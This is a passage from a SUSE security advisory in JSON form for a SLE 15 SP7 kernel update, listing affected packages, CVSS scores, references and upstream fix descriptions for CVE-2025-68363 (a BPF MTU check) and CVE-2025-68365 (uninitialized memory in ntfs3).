"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu\n\nThe bpf_skb_check_mtu helper needs to use skb-\u003etransport_header when\nthe BPF_MTU_CHK_SEGS flag is used:\n\n\tbpf_skb_check_mtu(skb, ifindex, \u0026mtu_len, 0, BPF_MTU_CHK_SEGS)\n\nThe transport_header is not always set. There is a WARN_ON_ONCE\nreport when CONFIG_DEBUG_NET is enabled + skb-\u003egso_size is set +\nbpf_prog_test_run is used:\n\nWARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071\n skb_gso_validate_network_len\n bpf_skb_check_mtu\n bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch\n bpf_test_run\n bpf_prog_test_run_skb\n\nFor a normal ingress skb (not test_run), skb_reset_transport_header\nis performed but there is plan to avoid setting it as described in\ncommit 2170a1f09148 (\"net: no longer reset transport_header in __netif_receive_skb_core()\").\n\nThis patch fixes the bpf helper by checking\nskb_transport_header_was_set(). The check is done just before\nskb-\u003etransport_header is used, to avoid breaking the existing bpf prog.\nThe WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68363",
"url": "https://www.suse.com/security/cve/CVE-2025-68363"
},
{
"category": "external",
"summary": "SUSE Bug 1255552 for CVE-2025-68363",
"url": "https://bugzilla.suse.com/1255552"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68363"
},
{
"cve": "CVE-2025-68365",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68365"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
